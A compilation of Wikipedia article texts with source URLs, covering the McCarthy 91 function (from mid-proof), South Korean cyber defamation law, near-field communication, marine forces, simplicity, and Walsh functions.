This can be used to show M(n) = M(101) = 91 for 90 ≤ n ≤ 100 by chaining the equalities: M(100) = M(101) = 91, M(99) = M(100) = 91, and so on down to M(90).
M(n) =M(101) = 91 for 90 ≤n≤ 100 can be used as the base case of the induction.
For the downward induction step, let n ≤ 89 and assume M(i) = 91 for all n < i ≤ 100; then M(n) = M(M(n + 11)) = M(91) = 91, since n < n + 11 ≤ 100 gives M(n + 11) = 91 by the induction hypothesis, and M(91) = 91 by the base case.
This provesM(n) = 91 for alln≤ 100, including negative values.
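The conclusion of the proof can also be checked mechanically; a minimal Python sketch comparing M against the closed form M′ over a sample range:

```python
def M(n):
    # Nested-recursive McCarthy 91 function
    return n - 10 if n > 100 else M(M(n + 11))


def M_prime(n):
    # Non-recursive closed form established by the proof
    return 91 if n <= 100 else n - 10


# The two definitions agree on every tested argument,
# including negative values.
assert all(M(n) == M_prime(n) for n in range(-50, 201))
```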
Donald Knuth generalized the 91 function to include additional parameters.[1] John Cowles developed a formal proof that Knuth's generalized function was total, using the ACL2 theorem prover.[2]
|
https://en.wikipedia.org/wiki/McCarthy_91_function
|
Cyber defamation or cyber insult in South Korean law is a crime or civil tort consisting of defamation or insult committed through a telecommunications network such as the Internet.
The crime of cyber defamation (사이버 명예훼손죄) is defined in the Information and Communications Network Act, which establishes a maximum term of imprisonment of three years if the insulting information is true and seven years if it is false.[1]South Korea's criminal penalties for cyber defamation have attracted attention for their severity relative to other countries.
The cyber defamation law arose from considerations by theKorea Communications Commission(KCC), South Korea's telecommunications and broadcasting regulator, of revising the telecommunications laws to impose more regulations and deeper scrutiny on major Internet portals.[2]
Public anger over the 2008 suicide of celebrity Choi Jin-sil[3] led to a legislative push for stronger legislation against cyberbullying, including the adoption of a real name system.[4] Among the legislative items pushed by the government was a cyber insult law, which would have imposed greater penalties than those provided for criminal insult under Article 311 of the Penal Code.[5] The legislation was sometimes referred to as the "Choi Jin-sil Law," although her family objected to this use of her name.[6] The governing Grand National Party (GNP) supported the cyber insult law, while the opposition Democratic Party opposed it.[7] A Research & Research survey of 800 Koreans conducted on 14 January 2009 showed that 60% supported the GNP-led bill dealing with cyber defamation, and 32.1% opposed it.[8]
Opposition to the proposed legislation gained force after the acquittal ofMinervain April 2009, which increased concerns over legislative restrictions onfreedom of expression.[9]The legislation was ultimately not adopted.[10]
South Korean plaintiffs have used cyber defamation law tosubpoenainformation from the United States.[11]In 2024 aCaliforniacourt granted the attorney representingNewJeanspermission to obtain the identity information of aYouTubeuser. Other similar cases includeHYBEon behalf ofBTSseeking the identity of aTwitteruser andStarship Entertainmenton behalf ofWonyoungidentifying an individual behind a YouTube channel with help fromGoogle.[12]
The vast majority of cyber defamation police reports in South Korea arise from online games, with League of Legends particularly notorious for such incidents. In 2015 alone, South Korean law enforcement received and investigated over 8,000 reports of cyber defamation; over half of these cases involved League of Legends, where players headed to police stations in retaliation after being verbally abused by teammates or opponents.[13]
|
https://en.wikipedia.org/wiki/Cyber_defamation_law
|
Near-field communication (NFC) is a set of communication protocols that enables communication between two electronic devices over a distance of 4 cm (1+1⁄2 in) or less.[1] NFC offers a low-speed connection through a simple setup that can be used for the bootstrapping of more capable wireless connections.[2] Like other proximity card technologies, NFC is based on inductive coupling between two electromagnetic coils present on an NFC-enabled device such as a smartphone. NFC communication in one or both directions uses a frequency of 13.56 MHz in the globally available unlicensed radio frequency ISM band, compliant with the ISO/IEC 18000-3 air interface standard, at data rates ranging from 106 to 848 kbit/s.
TheNFC Forumhas helped define and promote the technology, setting standards for certifying device compliance.[3][4]Secure communications are available by applying encryption algorithms as is done for credit cards[5]and if they fit the criteria for being considered apersonal area network.[6]
NFC standards cover communications protocols and data exchange formats and are based on existingradio-frequency identification(RFID) standards includingISO/IEC 14443andFeliCa.[7]The standards include ISO/IEC 18092[8]and those defined by the NFC Forum. In addition to the NFC Forum, theGSMAgroup defined a platform for the deployment of GSMA NFC Standards[9]within mobile handsets. GSMA's efforts include Trusted Services Manager,[10][11]Single Wire Protocol, testing/certification and secure element.[12]NFC-enabled portable devices can be provided withapplication software, for example to read electronic tags or make payments when connected to an NFC-compliant system. These are standardized to NFC protocols, replacing proprietary technologies used by earlier systems.
A patent licensing program for NFC is under deployment by France Brevets, a patent fund created in 2011. This program was under development by Via Licensing Corporation, an independent subsidiary ofDolby Laboratories, and was terminated in May 2012.[13]A platform-independentfree and open sourceNFC library,libnfc, is available under theGNU Lesser General Public License.[14][15]
Present and anticipated applications include contactless transactions, data exchange and simplified setup of more complex communications such asWi-Fi.[16]In addition, when one of the connected devices has Internet connectivity, the other can exchange data with online services.[citation needed]
Near-field communication (NFC) technology not only supports data transmission but also enables wireless charging, providing a dual-functionality that is particularly beneficial for small, portable devices. The NFC Forum has developed a specific wireless charging specification, known as NFC Wireless Charging (WLC), which allows devices to charge with up to 1W of power over distances of up to2 cm (3⁄4in).[17]This capability is especially suitable for smaller devices like earbuds, wearables, and other compact Internet of Things (IoT) appliances.[17]
Compared to the more widely knownQi wireless chargingstandard by theWireless Power Consortium, which offers up to 15W of power over distances up to4 cm (1+5⁄8in), NFC WLC provides a lower power output but benefits from a significantly smaller antenna size.[17]This makes NFC WLC an ideal solution for devices where space is at a premium and high power charging is less critical.[17]
The NFC Forum also facilitates a certification program, labeled as Test Release 13.1 (TR13.1), ensuring that products adhere to the WLC 2.0 specification. This certification aims to establish trust and consistency across NFC implementations, minimizing risks for manufacturers and providing assurance to consumers about the reliability and functionality of their NFC-enabled wireless charging devices.[17]
NFC is rooted inradio-frequency identificationtechnology (known as RFID) which allows compatible hardware to both supply power to and communicate with an otherwise unpowered and passive electronic tag using radio waves. This is used for identification, authentication andtracking. Similar ideas in advertising and industrial applications were not generally successful commercially, outpaced by technologies such asQR codes,barcodesandUHFRFIDtags.[citation needed]
Ultra-wideband (UWB), another radio technology, has been hailed alongside Bluetooth and other wireless technologies as a possible future alternative to NFC because it supports data transmission over greater distances.[55]
NFC is a set of short-range wireless technologies, typically requiring a separation of10 cm (3+7⁄8in) or less. NFC operates at 13.56MHzonISO/IEC 18000-3air interface and at rates ranging from 106 kbit/s to 424 kbit/s. NFC always involves an initiator and a target; the initiator actively generates anRFfield that can power a passive target. This enables NFC targets to take very simple form factors such as unpowered tags, stickers, key fobs, or cards. NFC peer-to-peer communication is possible, provided both devices are powered.[56]
NFC tags contain data and are typically read-only, but may be writable. They can be custom-encoded by their manufacturers or use NFC Forum specifications. The tags can securely store personal data such as debit and credit card information, loyalty program data, PINs and networking contacts, among other information. The NFC Forum defines five types of tags that provide different communication speeds and capabilities in terms of configurability, memory, security,data retentionand write endurance.[57]
As withproximity cardtechnology, NFC usesinductive couplingbetween two nearbyloop antennaseffectively forming an air-coretransformer. Because the distances involved are tiny compared to thewavelengthofelectromagnetic radiation(radio waves) of that frequency (about 22 metres), the interaction is described asnear field. An alternatingmagnetic fieldis the main coupling factor and almost no power is radiated in the form ofradio waves(which are electromagnetic waves, also involving an oscillatingelectric field); that minimises interference between such devices and any radio communications at the same frequency or with other NFC devices much beyond its intended range. NFC operates within the globally available and unlicensedradio frequencyISM bandof 13.56 MHz. Most of the RF energy is concentrated in the ±7 kHz bandwidth allocated for that band, but the emission'sspectral widthcan be as wide as 1.8 MHz[58]in order to support high data rates.
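The ~22 m wavelength quoted above follows directly from the 13.56 MHz carrier; a quick sketch (the λ/2π near-field boundary used below is a standard antenna-theory rule of thumb, not a figure from this article):

```python
import math

C = 299_792_458        # speed of light in vacuum, m/s
F = 13.56e6            # NFC carrier frequency, Hz

wavelength = C / F                          # about 22.1 m
near_field_boundary = wavelength / (2 * math.pi)  # about 3.5 m

print(round(wavelength, 1), round(near_field_boundary, 1))
```

Since NFC working distances are a few centimetres, vastly below even the λ/2π boundary, the coupling is indeed magnetic near-field rather than radiative.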
Working distance with compact standard antennas and realistic power levels could be up to about 20 cm (7+7⁄8 in), but in practice working distances never exceed 10 cm (3+7⁄8 in). Note that because eddy currents induced in nearby metallic surfaces can quench the pickup antenna, the tags may require a minimum separation from such surfaces.[59]
The ISO/IEC 18092 standard supports data rates of 106, 212 or 424 kbit/s.
The communication takes place between an active "initiator" device and a target device which may either be:
NFC employs two differentcodingsto transfer data. If an active device transfers data at 106 kbit/s, a modifiedMiller codingwith 100 percentmodulationis used. In all other casesManchester codingis used with a modulation ratio of 10 percent.
Every active NFC device can work in one or more of three modes:
NFC tags are passive data stores which can be read, and under some circumstances written to, by an NFC device. They typically contain data (as of 2015[update]between 96 and 8,192 bytes) and are read-only in normal use, but may be rewritable. Applications include secure personal data storage (e.g.debitorcredit cardinformation,loyalty programdata,personal identification numbers(PINs), contacts). NFC tags can be custom-encoded by their manufacturers or use the industry specifications.
Although the range of NFC is limited to a few centimeters, standard plain NFC is not protected againsteavesdroppingand can be vulnerable to data modifications. Applications may use higher-layercryptographic protocolsto establish a secure channel.
The RF signal for the wireless data transfer can be picked up with antennas. The distance from which an attacker is able to eavesdrop the RF signal depends on multiple parameters, but is typically less than 10 meters.[60]Also, eavesdropping is highly affected by the communication mode. A passive device that doesn't generate its own RF field is much harder to eavesdrop on than an active device. An attacker can typically eavesdrop within 10 m of an active device and 1 m for passive devices.[61]
Because NFC devices usually includeISO/IEC 14443protocols,relay attacksare feasible.[62][63][64][page needed]For this attack the adversary forwards the request of the reader to the victim and relays its answer to the reader in real time, pretending to be the owner of the victim's smart card. This is similar to aman-in-the-middle attack.[62]Onelibnfccode example demonstrates a relay attack using two stock commercial NFC devices. This attack can be implemented using only two NFC-enabled mobile phones.[65]
NFC standards cover communications protocols and data exchange formats, and are based on existing RFID standards includingISO/IEC 14443andFeliCa.[7]The standards include ISO/IEC 18092[8]and those defined by the NFC Forum.
NFC is standardized in ECMA-340 and ISO/IEC 18092. These standards specify the modulation schemes, coding, transfer speeds and frame format of the RF interface of NFC devices, as well as initialization schemes and conditions required for data collision-control during initialization for both passive and active NFC modes. They also define thetransport protocol, including protocol activation and data-exchange methods. The air interface for NFC is standardized in:
NFC incorporates a variety of existing standards includingISO/IEC 14443Type A and Type B, andFeliCa(also simply named F or NFC-F). NFC-enabled phones work at a basic level with existing readers. In "card emulation mode" an NFC device should transmit, at a minimum, a unique ID number to a reader. In addition, NFC Forum defined a common data format calledNFC Data Exchange Format(NDEF) that can store and transport items ranging from anyMIME-typed object to ultra-short RTD-documents,[68]such asURLs. The NFC Forum added theSimple NDEF Exchange Protocol(SNEP) to the spec that allows sending and receiving messages between two NFC devices.[69]
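To illustrate the NDEF wire format, here is a hedged sketch of building and parsing a single short-record Text record (well-known type "T"), following the NFC Forum Text record layout; the function names are ours:

```python
def ndef_text_record(text, lang="en"):
    """Build one short-record (SR) NDEF Text record.
    Payload = status byte (language-code length, UTF-8)
              + language code + text."""
    payload = bytes([len(lang)]) + lang.encode("ascii") + text.encode("utf-8")
    # 0xD1 header: MB=1, ME=1, CF=0, SR=1, IL=0, TNF=0x1 (well-known type)
    return bytes([0xD1, 0x01, len(payload)]) + b"T" + payload


def parse_text_record(record):
    """Parse the record built above back into (language, text)."""
    assert record[0] == 0xD1 and record[3:4] == b"T"
    payload = record[4:4 + record[2]]
    lang_len = payload[0] & 0x3F          # low 6 bits of the status byte
    lang = payload[1:1 + lang_len].decode("ascii")
    return lang, payload[1 + lang_len:].decode("utf-8")
```

A record built this way round-trips through the parser, e.g. `parse_text_record(ndef_text_record("hello"))` yields `("en", "hello")`.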
TheGSM Association (GSMA)is a trade association representing nearly 800 mobile telephony operators and more than 200 product and service companies across 219 countries. Many of its members have led NFC trials and are preparing services for commercial launch.[70]
The GSMA is involved with several initiatives:
StoLPaN (Store Logistics and Payment with NFC) is a pan-European consortium supported by theEuropean Commission'sInformation Society Technologiesprogram. StoLPaN will examine the potential for NFC local wireless mobile communication.[74]
NFC Forum is a non-profit industry association formed on March 18, 2004, byNXP Semiconductors,SonyandNokiato advance the use of NFC wireless interaction in consumer electronics, mobile devices and PCs. Its specifications include the five distinct tag types that provide different communication speeds and capabilities covering flexibility, memory, security, data retention and write endurance. NFC Forum promotes implementation and standardization of NFC technology to ensure interoperability between devices and services. As of January 2020, the NFC Forum had over 120 member companies.[75]
NFC Forum promotes NFC and certifies device compliance[5]and whether it fits in apersonal area network.[5]
GSMA defined a platform for the deployment of GSMA NFC Standards[9] within mobile handsets. GSMA's efforts include the Single Wire Protocol, testing and certification, and the secure element.[12][76] The GSMA standards surrounding the deployment of NFC protocols (governed by the NFC Forum) on mobile handsets are neither exclusive nor universally accepted. For example, Google's deployment of Host Card Emulation on Android KitKat provides for software control of a universal radio. In this HCE deployment[77] the NFC protocol is leveraged without the GSMA standards.
Other standardization bodies involved in NFC include:
NFC allows one- and two-way communication between endpoints, suitable for many applications.
NFC devices can act as electronicidentity documentsandkeycards.[2]They are used incontactless paymentsystems and allowmobile paymentreplacing or supplementing systems such as credit cards andelectronic ticketsmart cards. These are sometimes calledNFC/CTLSorCTLS NFC, withcontactlessabbreviated asCTLS. NFC can be used to share small files such as contacts and for bootstrapping fast connections to share larger media such as photos, videos, and other files.[78]
NFC devices can be used in contactless payment systems, similar to those used in credit cards andelectronic ticketsmart cards, and allow mobile payment to replace/supplement these systems.
InAndroid4.4, Google introduced platform support for secure NFC-based transactions throughHost Card Emulation(HCE), for payments, loyalty programs, card access, transit passes and other custom services. HCE allows any Android 4.4 app to emulate an NFC smart card, letting users initiate transactions with their device. Apps can use a new Reader Mode to act as readers for HCE cards and other NFC-based transactions.
On September 9, 2014,Appleannounced support for NFC-powered transactions as part ofApple Pay.[79]With the introduction of iOS 11, Apple devices allow third-party developers to read data from NFC tags.[80]
As of 2022, there are five major NFC apps available in the UK: Apple Pay, Google Pay, Samsung Pay, Barclays Contactless Mobile and Fitbit Pay. The UK Finance's UK Payment Markets Summary 2021 looked at Apple Pay, Google Pay and Samsung Pay and found 17.3 million UK adults had registered for mobile payment (up 75% from the year before) and of those, 84% had made a mobile payment.[81]
NFC offers a low-speed connection with simple setup that can be used tobootstrapmore capablewireless connections.[2]For example,Android Beamsoftware uses NFC to enable pairing and establish a Bluetooth connection when doing a file transfer and then disabling Bluetooth on both devices upon completion.[82]Nokia, Samsung, BlackBerry and Sony[83]have used NFC technology to pair Bluetooth headsets, media players and speakers with one tap.[84]The same principle can be applied to the configuration of Wi-Fi networks.Samsung Galaxydevices have a feature namedS-Beam—an extension of Android Beam that uses NFC (to shareMAC addressandIP addresses) and then usesWi-Fi Directto share files and documents. The advantage of using Wi-Fi Direct over Bluetooth is that it permits much faster data transfers, running up to 300 Mbit/s.[56]
NFC can be used forsocial networking, for sharing contacts, text messages and forums, links to photos, videos or files[78]and entering multiplayermobile games.[85]
NFC-enabled devices can act as electronicidentity documentsfound in passports and ID cards, andkeycardsfor the use infare cards,transit passes,login cards, car keys andaccess badges.[2]NFC's short range and encryption support make it more suitable than less private RFID systems.
NFC-equipped smartphones can be paired withNFC Tagsor stickers that can be programmed by NFC apps. These programs can allow a change of phone settings, texting, app launching, or command execution.
Such apps do not rely on a company or manufacturer, but can be utilized immediately with an NFC-equipped smartphone and an NFC tag.[86]
The NFC Forum published theSignature Record Type Definition(RTD) 2.0 in 2015 to add integrity and authenticity for NFC Tags. This specification allows an NFC device to verify tag data and identify the tag author.[87]
NFC has been used invideo gamesstarting withSkylanders: Spyro's Adventure.[88]These are customizable figurines which contain personal data with each figure, so no two figures are exactly alike. Nintendo'sWii U GamePadwas the first console system to include NFC technology out of the box. It was later included in theNintendo 3DSrange (being built into the New Nintendo 3DS/XL and in a separately sold reader which usesInfraredto communicate to older 3DS family consoles) and theNintendo Switchrange (being built within the rightJoy-Concontroller and directly in the Nintendo Switch Lite). Theamiiborange of accessories utilize NFC technology to unlock features.
Adidas Telstar 18is a soccer ball that contains an NFC chip within.[89]The chip enables users to interact with the ball using a smartphone.[90]
NFC and Bluetooth are both relatively short-range communication technologies available onmobile phones. NFC operates at slower speeds than Bluetooth and has a much shorter range, but consumes far less power and doesn't require pairing.[91]
NFC sets up more quickly than standard Bluetooth, but has a lower transfer rate than Bluetooth Low Energy. With NFC, instead of performing manual configuration to identify devices, the connection between two NFC devices is established automatically in less than 0.1 seconds. The maximum data transfer rate of NFC (424 kbit/s) is slower than that of Bluetooth V2.1 (2.1 Mbit/s).
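The practical effect of these rates can be sketched with simple arithmetic (the 1 MB example file size is our assumption, and protocol overhead is ignored):

```python
def transfer_seconds(size_bytes, rate_bits_per_s):
    """Idealized transfer time at a given link rate."""
    return size_bytes * 8 / rate_bits_per_s


NFC_MAX = 424_000      # bit/s, NFC maximum
BT_V21 = 2_100_000     # bit/s, Bluetooth V2.1

photo = 1_000_000      # assumed 1 MB file
print(round(transfer_seconds(photo, NFC_MAX), 1))  # ~18.9 s
print(round(transfer_seconds(photo, BT_V21), 1))   # ~3.8 s
```

This is why NFC is typically used for tiny payloads and for handover, with bulk data moved over Bluetooth or Wi-Fi after the NFC-initiated pairing.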
NFC's maximum working distance of less than20 cm (7+7⁄8in) reduces the likelihood of unwanted interception, making it particularly suitable for crowded areas that complicate correlating a signal with its transmitting physical device (and by extension, its user).[92]
NFC is compatible with existing passive RFID (13.56 MHz ISO/IEC 18000-3) infrastructures. It requires comparatively low power, similar to the Bluetooth V4.0 low-energy protocol. However, when NFC works with an unpowered device (e.g. on a phone that may be turned off, a contactless smart credit card, a smart poster), the NFC power consumption is greater than that of Bluetooth V4.0 Low Energy, since illuminating the passive tag needs extra power.[91]
In 2011, handset vendors released more than 40 NFC-enabled handsets with theAndroidmobile operating system.BlackBerrydevices support NFC using BlackBerry Tag on devices running BlackBerry OS 7.0 and greater.[93]
MasterCardadded further NFC support for PayPass for the Android and BlackBerry platforms, enabling PayPass users to make payments using their Android or BlackBerry smartphones.[94]A partnership betweenSamsungandVisaadded a 'payWave' application on the Galaxy S4 smartphone.[95]
In 2012,Microsoftadded native NFC functionality in theirmobile OSwithWindows Phone 8, as well as theWindows 8operating system. Microsoft provides the "Wallet hub" in Windows Phone 8 for NFC payment, and can integrate multiple NFC payment services within a single application.[96]
In 2014, Apple released the iPhone 6 with NFC support.[97] Since September 2019, with iOS 13, Apple allows NFC tags to be both read and written using an NFC app.[citation needed]
As of April 2011 hundreds of NFC trials had been conducted. Some firms moved to full-scale service deployments, spanning one or more countries. Multi-country deployments includeOrange's rollout of NFC technology to banks, retailers, transport, and service providers in multiple European countries,[42]andAirtel AfricaandOberthur Technologiesdeploying to 15 countries throughout Africa.[98]
|
https://en.wikipedia.org/wiki/Near-field_communication
|
Many countries around the world maintain marines and naval infantry military units. Even if only a few nations have the capability to launch major amphibious assault operations, most marine and naval infantry forces are able to carry out limited amphibious landings, riverine and coastal warfare tasks. The list also includes army units specifically trained to operate as marines or naval infantry, and navy units with specialized naval security and boarding tasks.
The Marine Fusiliers Regiments are the marine infantry regiments of the Algerian Navy, specialised in amphibious warfare.[1]
These regiments have about 7,000 soldiers in their ranks.
Within the Algerian navy there are 8 regiments of marine fusiliers:
Future marine fusiliers andmarine commandosare trained in:
Army
Navy
Army
Navy
The IDF's 35th Parachute Brigade "Flying Serpent" is a paratrooper brigade that also exercises sea-landing capabilities.
The Italian Army's Cavalry Brigade "Pozzuolo del Friuli" forms, together with the Italian Navy's 3rd Naval Division and San Marco Marine Brigade, the Italian military's National Sea Projection Capability (Forza di proiezione dal mare).
Additionally, the 17th Anti-aircraft Artillery Regiment "Sforzesca" provides air-defense assets.
|
https://en.wikipedia.org/wiki/List_of_marines_and_similar_forces
|
Simplicity is the state or quality of being simple. Something easy to understand or explain seems simple, in contrast to something complicated. Alternatively, as Herbert A. Simon suggests, something is simple or complex depending on the way we choose to describe it.[1] In some uses, the label "simplicity" can imply beauty, purity, or clarity. In other cases, the term may suggest a lack of nuance or complexity relative to what is required.
The concept of simplicity is related to the field ofepistemologyandphilosophy of science(e.g., inOccam's razor). Religions also reflect on simplicity with concepts such asdivine simplicity. In humanlifestyles, simplicity can denote freedom from excessive possessions or distractions, such as having asimple livingstyle. In some cases, the term may have negative connotations, as when referring to someone as asimpleton.
There is a widespread philosophical presumption that simplicity is a theoretical virtue. This presumption that simpler theories are preferable appears in many guises. Often it remains implicit; sometimes it is invoked as a primitive, self-evident proposition; other times it is elevated to the status of a 'Principle' and labeled as such (for example, the 'Principle of Parsimony').[2]
According toOccam's razor, all other things being equal, thesimplesttheory is most likely true. In other words, simplicity is a meta-scientific criterion by which scientists evaluate competing theories.
A distinction is often made[by whom?] between two senses of simplicity: syntactic simplicity (the number and complexity of hypotheses) and ontological simplicity (the number and complexity of things postulated). These two aspects of simplicity are often referred to as elegance and parsimony, respectively.[3]
John von Neumanndefines simplicity as an important esthetic criterion of scientific models:
[...] (scientific model) must satisfy certain esthetic criteria - that is, in relation to how much it describes, it must be rather simple. I think it is worth while insisting on these vague terms - for instance, on the use of word rather. One cannot tell exactly how "simple" simple is. [...] Simplicity is largely a matter of historical background, of previous conditioning, of antecedents, of customary procedures, and it is very much a function of what is explained by it.[4]
The recognition that too much complexity can have a negative effect on business performance was highlighted in research undertaken in 2011 by Simon Collinson of theWarwick Business Schooland the Simplicity Partnership, which found that managers who are orientated towards finding ways of making business "simpler and more straightforward" can have a beneficial impact on their organisation.
Most organizations contain some amount of complexity that is not performance enhancing, but drains value out of the company. Collinson concluded that this type of 'bad complexity' reduced profitability (EBITDA) by more than 10%.[5]
Collinson identified a role for "simplicity-minded managers", managers who were "predisposed towards simplicity", and identified a set of characteristics related to the role, namely "ruthless prioritisation", the ability to say "no", willingness to iterate, to reduce communication to the essential points of a message and the ability to engage a team.[5]His report, theGlobal Simplicity Index 2011, was the first ever study to calculate the cost of complexity in the world's largest organisations.[6]
The Global Simplicity Index identified that complexity occurs in five key areas of an organisation: people, processes, organisational design, strategy, and products and services.[7] The research is repeated and published annually as the "global brands report".[8]: 3 The 2022 report incorporates a "brand simplicity score" and an "industry simplicity score".[9]
Research by Ioannis Evmoiridis atTilburg Universityfound that earnings reported by "high simplicity firms" are higher than among other businesses, and that such firms "exhibit[ed] a superior performance during the period 2010 - 2015", whilst requiring lower average capital expenditure and lowerleverage.[8]: 18
Simplicity is a theme in the Christian religion. According to St. Thomas Aquinas, God is infinitely simple. The Roman Catholic and Anglican religious orders of Franciscans also strive for personal simplicity. Members of the Religious Society of Friends (Quakers) practice the Testimony of Simplicity, which involves simplifying one's life to focus on what is important and disregard or avoid what is least important. Simplicity is a tenet of Anabaptism, and some Anabaptist groups, like the Bruderhof, make an effort to live simply.[10][11]
In the context of humanlifestyle, simplicity can denote freedom from excessive material consumption and psychological distractions.
"Receive with simplicity everything that happens to you." —Rashi(French rabbi, 11th century), citation at the beginning of the filmA Serious Man(2009),Coen Brothers
|
https://en.wikipedia.org/wiki/Global_Simplicity_Index
|
In mathematics, more specifically in harmonic analysis, Walsh functions form a complete orthogonal set of functions that can be used to represent any discrete function, just as trigonometric functions can be used to represent any continuous function in Fourier analysis.[1] They can thus be viewed as a discrete, digital counterpart of the continuous, analog system of trigonometric functions on the unit interval. But unlike the sine and cosine functions, which are continuous, Walsh functions are piecewise constant. They take the values −1 and +1 only, on sub-intervals defined by dyadic fractions.
The system of Walsh functions is known as theWalsh system. It is an extension of theRademacher systemof orthogonal functions.[2]
Walsh functions, the Walsh system, the Walsh series,[3]and thefast Walsh–Hadamard transformare all named after the American mathematicianJoseph L. Walsh. They find various applications inphysicsandengineeringwhenanalyzing digital signals.
Historically, various numerations of Walsh functions have been used; none of them is particularly superior to another. This article uses the Walsh–Paley numeration.
We define the sequence of Walsh functions W_k : [0, 1] → {−1, 1}, k ∈ ℕ, as follows.
For any natural number k and real number x ∈ [0, 1], let k_j be the j-th bit in the binary representation of k, starting with k_0 as the least significant bit, and let x_j be the j-th bit in the fractional binary representation of x = \sum_{j=1}^{\infty} x_j 2^{-j}, starting with x_1 as the most significant fractional bit.
Then, by definition W_k(x) = (-1)^{\sum_{j=0}^{\infty} k_j x_{j+1}}.
In particular,W0(x)=1{\displaystyle W_{0}(x)=1}everywhere on the interval, since all bits ofkare zero.
Notice thatW2m{\displaystyle W_{2^{m}}}is precisely theRademacher functionrm.
Thus, the Rademacher system is a subsystem of the Walsh system. Moreover, every Walsh function is a product of Rademacher functions:
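This construction is easy to check numerically. The following is a minimal sketch in Python (the dyadic-grid evaluation points are an arbitrary choice for the demonstration):

```python
def rademacher(m, x):
    # r_m(x) = (-1)**(the (m+1)-th binary digit of x); equals sign(sin(2**(m+1)*pi*x)) a.e.
    return 1 - 2 * (int(x * 2 ** (m + 1)) % 2)

def walsh(k, x):
    # Walsh-Paley W_k: the product of r_m over the set bits m of k, so W_0 = 1.
    result, m = 1, 0
    while k >> m:
        if (k >> m) & 1:
            result *= rademacher(m, x)
        m += 1
    return result

xs = [(i + 0.5) / 8 for i in range(8)]   # midpoints of the dyadic intervals of length 1/8

# W_{2^m} is exactly r_m, and W_3 = r_0 * r_1 pointwise
assert all(walsh(4, x) == rademacher(2, x) for x in xs)
assert all(walsh(3, x) == rademacher(0, x) * rademacher(1, x) for x in xs)
```

As a byproduct, the same code exhibits the group law of the Walsh system: multiplying two Walsh functions pointwise multiplies the exponents mod 2, i.e. W_j · W_k = W_{j XOR k}.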
Walsh functions and trigonometric functions are both systems that form a complete, orthonormal set of functions, an orthonormal basis in the Hilbert space L²[0,1] of the square-integrable functions on the unit interval. Both are systems of bounded functions, unlike, say, the Haar system or the Franklin system.
Both trigonometric and Walsh systems admit natural extension by periodicity from the unit interval to the real line. Furthermore, both Fourier analysis on the unit interval (Fourier series) and on the real line (Fourier transform) have their digital counterparts defined via the Walsh system: the Walsh series analogous to the Fourier series, and the Hadamard transform analogous to the Fourier transform.
The Walsh system {W_k}, k ∈ ℕ₀, is an abelian multiplicative discrete group isomorphic to ∐_{n=0}^∞ ℤ/2ℤ, the Pontryagin dual of the Cantor group ∏_{n=0}^∞ ℤ/2ℤ. Its identity is W_0, and every element is of order two (that is, self-inverse).
The Walsh system is an orthonormal basis of the Hilbert space L²[0,1]. Orthonormality means
∫₀¹ W_k(x) W_l(x) dx = δ_{kl},
and being a basis means that if, for every f ∈ L²[0,1], we set f_k = ∫₀¹ f(x) W_k(x) dx, then
f(x) = ∑_{k=0}^∞ f_k W_k(x),
with the series converging in the norm of L²[0,1].
It turns out that for every f ∈ L²[0,1], the series ∑_{k=0}^∞ f_k W_k(x) converges to f(x) for almost every x ∈ [0,1].
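For a step function on a dyadic grid of N points, the first N Walsh coefficients reconstruct the function exactly at the grid midpoints. A small sketch (the particular step function is an arbitrary choice for the demo):

```python
def walsh(k, x):
    # Walsh-Paley W_k(x) = (-1)**(sum over j of k_j * x_{j+1}),
    # taken over the binary digits of k and of x
    s, m = 0, 0
    while k >> m:
        if (k >> m) & 1:
            s += int(x * 2 ** (m + 1)) & 1   # the (m+1)-th binary digit of x
        m += 1
    return -1 if s & 1 else 1

N = 8
xs = [(i + 0.5) / N for i in range(N)]       # midpoints of the dyadic grid
f = lambda x: 3.0 if x < 0.25 else (-1.0 if x < 0.5 else 0.5)

# Walsh coefficients f_k = integral of f * W_k; the midpoint rule is exact here
# because f and W_0..W_7 are all constant on each interval of length 1/8
coeff = [sum(f(x) * walsh(k, x) for x in xs) / N for k in range(N)]

# The N-term partial sum of the Walsh series recovers f at every grid point
recon = [sum(coeff[k] * walsh(k, x) for k in range(N)) for x in xs]
assert all(abs(r - f(x)) < 1e-9 for r, x in zip(recon, xs))
```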
The Walsh system (in Walsh–Paley numeration) forms a Schauder basis in L^p[0,1], 1 < p < ∞. Note that, unlike the Haar system, and like the trigonometric system, this basis is not unconditional, nor is the system a Schauder basis in L¹[0,1].
Let 𝔻 = ∏_{n=1}^∞ ℤ/2ℤ be the compact Cantor group endowed with Haar measure, and let 𝔻̂ = ∐_{n=1}^∞ ℤ/2ℤ be its discrete group of characters. Elements of 𝔻̂ are readily identified with Walsh functions. Of course, the characters are defined on 𝔻 while Walsh functions are defined on the unit interval, but since there exists a modulo zero isomorphism between these measure spaces, measurable functions on them are identified via an isometry.
Then basic representation theory suggests the following broad generalization of the concept of a Walsh system.
For an arbitrary Banach space (X, ‖·‖), let {R_t}_{t∈𝔻} ⊂ Aut X be a strongly continuous, uniformly bounded, faithful action of 𝔻 on X. For every γ ∈ 𝔻̂, consider its eigenspace X_γ = {x ∈ X : R_t x = γ(t)x}. Then X is the closed linear span of the eigenspaces: X = closed span(X_γ : γ ∈ 𝔻̂). Assume that every eigenspace is one-dimensional and pick an element w_γ ∈ X_γ such that ‖w_γ‖ = 1. Then the system {w_γ}_{γ∈𝔻̂}, or the same system in the Walsh–Paley numeration of the characters {w_k}_{k∈ℕ₀}, is called the generalized Walsh system associated with the action {R_t}_{t∈𝔻}. The classical Walsh system becomes a special case, namely for X = L^p[0,1] and the action by dyadic translations
(R_t f)(x) = f(x ⊕ t),
where ⊕ is addition modulo 2, performed coordinatewise on binary digit sequences.
In the early 1990s, Serge Ferleger and Fyodor Sukochev showed that in a broad class of Banach spaces (so-called UMD spaces[4]) generalized Walsh systems have many properties similar to the classical one: they form a Schauder basis[5] and a uniform finite-dimensional decomposition[6] in the space, and have the property of random unconditional convergence.[7] One important example of a generalized Walsh system is the Fermion Walsh system in non-commutative L^p spaces associated with the hyperfinite type II factor.
The Fermion Walsh system is a non-commutative, or "quantum", analog of the classical Walsh system. Unlike the latter, it consists of operators, not functions. Nevertheless, both systems share many important properties, e.g., both form an orthonormal basis in the corresponding Hilbert space, or a Schauder basis in corresponding symmetric spaces. Elements of the Fermion Walsh system are called Walsh operators.
